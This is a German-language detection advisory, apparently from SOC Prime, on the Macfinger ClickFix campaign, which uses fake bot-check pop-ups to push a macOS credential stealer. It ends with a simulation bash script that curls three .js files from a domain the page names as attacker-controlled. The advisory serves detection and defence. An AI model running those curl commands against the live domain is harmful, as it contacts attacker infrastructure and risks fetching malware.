SOC Prime Bias: High

24 Sep 2026 06:40 UTC

Macfinger ClickFix-Kampagne

Author Photo
SOC Prime Team linkedin icon Folgen
Macfinger ClickFix-Kampagne
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

Eine neue Social-Engineering-Kampagne, die als Macfinger ClickFix verfolgt wird, zielt auf macOS-Nutzer, indem sie bösartige Skripte in legitime Webseiten injiziert. Der Angriff präsentiert gefälschte Bot-Schutzseiten, die Opfer dazu bringen, Befehle auszuführen, die macOS-spezifische Malware herunterladen. Die Nutzlast scheint eine Variante des Atomic macOS Stealer (AMOS) zu sein, die entwickelt wurde, um Anmeldeinformationen und andere Benutzerinformationen zu stehlen.

Untersuchung

Die Untersuchung identifizierte legitime Webseiten, die mit injizierten Skripten kompromittiert wurden, die gefälschte Verifizierungspopups anzeigen. Eine Analyse des Netzwerkverkehrs enthüllte eine dedizierte Domain zur Benutzerverfolgung sowie mehrere IP-Adressen, die die Malware-Auslieferung und Command-and-Control (C2)-Kommunikation unterstützen. Beobachtete Verkehrsströme weisen auf die Exfiltration von Anmelde- und Systeminformationen über HTTP POST-Anfragen hin.

Minderung

Benutzer sollten geschult werden, den Anweisungen unerwarteter Browser-Popups oder gefälschter Bot-Verifizierungsseiten nicht zu folgen. Organisationen sollten Webfiltering einsetzen, um bekannte bösartige Domains und IP-Adressen, die mit ClickFix-Kampagnen verbunden sind, zu blockieren. Es wird auch empfohlen, ungewöhnliche ausgehende Verbindungen zu nicht vertrauenswürdigen IP-Adressen über nicht standardmäßige Ports zu überwachen.

Reaktion

Wird Macfinger ClickFix-Aktivität entdeckt, sollten betroffene macOS-Hosts sofort isoliert werden, um weiteren Datenverlust zu stoppen. Einsatzkräfte sollten eine vollständige forensische Untersuchung durchführen, um das Ausmaß des Anmeldeinformationen-Kompromisses zu bestimmen. Potenziell ausgesetzte Anmeldeinformationen sollten zurückgesetzt und Systeme auf Persistenzmechanismen wie unautorisierte Shell-Skripte oder Mach-O-Binaries überprüft werden.

Angriffsfluss

Wir aktualisieren diesen Teil noch.

Erkennungen

Möglicher IP-Adressbezug Domänenkommunikationsversuch (via dns)

SOC Prime Team
23. Sep 2026

Verdächtige Command-and-Control durch ungewöhnliche Top-Level-Domain (TLD) DNS-Anfrage (via dns)

SOC Prime Team
23. Sep 2026

Möglicher System_profiler-Enumerationsversuch (via process_creation)

SOC Prime Team
23. Sep 2026

Mögliche Base64-codierte Zeichenfolgenmanipulation [MacOS] (via cmdline)

SOC Prime Team
23. Sep 2026

Verdächtiger Curl-Ausführungsversuch [MacOS] (via cmdline)

SOC Prime Team
23. Sep 2026

IOCs (HashSha256) zur Erkennung: Macfinger ClickFix-Kampagne

SOC Prime AI-Regeln
23. Sep 2026

IOCs (SourceIP) zur Erkennung: Macfinger ClickFix-Kampagne

SOC Prime AI-Regeln
23. Sep 2026

IOCs (DestinationIP) zur Erkennung: Macfinger ClickFix-Kampagne

SOC Prime AI-Regeln
23. Sep 2026

Erkennen des Macfinger ClickFix-Kampagnenverkehrs [Firewall]

SOC Prime AI-Regeln
23. Sep 2026

Erkennen der Macfinger ClickFix-Skriptinjektion [Webserver]

SOC Prime AI-Regeln
23. Sep 2026

Simulationsausführung

  • Angriffserzählung & Befehle: Ein Angreifer verwendet eine Social-Engineering-Technik bekannt als „ClickFix“, bei der ein Benutzer aufgefordert wird, auf einen Knopf zu klicken (oft ein gefälschtes „Fix“ oder „Update“), der ein bösartiges Skript ausführt. In dieser Simulation ahmen wir die Endstufe nach: der clientseitige Browser/Agent, der eine Anfrage an die von Macfinger kontrollierte Domain stellt um eine bösartige to fetch a malicious .js Datei abzurufen. Diese Anfrage ist so gestaltet, dass sie eines der drei spezifischen Auswahlkriterien in der Erkennungslogik erfüllt.

  • Regressionstestskript:

    #!/bin/bash
    # Simulationsskript zur Auslösung der Macfinger ClickFix-Erkennungsregel
    
    echo "[*] Start der Macfinger ClickFix-Simulation..."
    
    # Ziel 1: Auswahl1 (Site-Parameter)
    echo "[*] Simuliere Anfrage an Auswahl1..."
    curl -s -o /dev/null "http://velvet-otter-glagceis.life/t.js?site=test_payload"
    
    # Ziel 2: Auswahl2 (spezifische Hash-Datei)
    echo "[*] Simuliere Anfrage an Auswahl2..."
    curl -s -o /dev/null "http://velvet-otter-glagceis.life/t.4b1009ff6c3f.js"
    
    # Ziel 3: Auswahl3 (ext-b Datei)
    echo "[*] Simuliere Anfrage an Auswahl3..."
    curl -s -o /dev/null "http://velvet-otter-glagceis.life/ext-b.4f9db6afad06a.js"
    
    echo "[+] Simulation abgeschlossen. Überprüfen Sie SIEM auf Alarme."
  • Bereinigungskommandos:

    # Keine lokale Bereinigung erforderlich, da es sich um ausgehende Netzwerk-Aktionen handelt.
    # Falls lokale Dateien erstellt wurden, entfernen Sie diese:
    rm -f /tmp/macfinger_test_*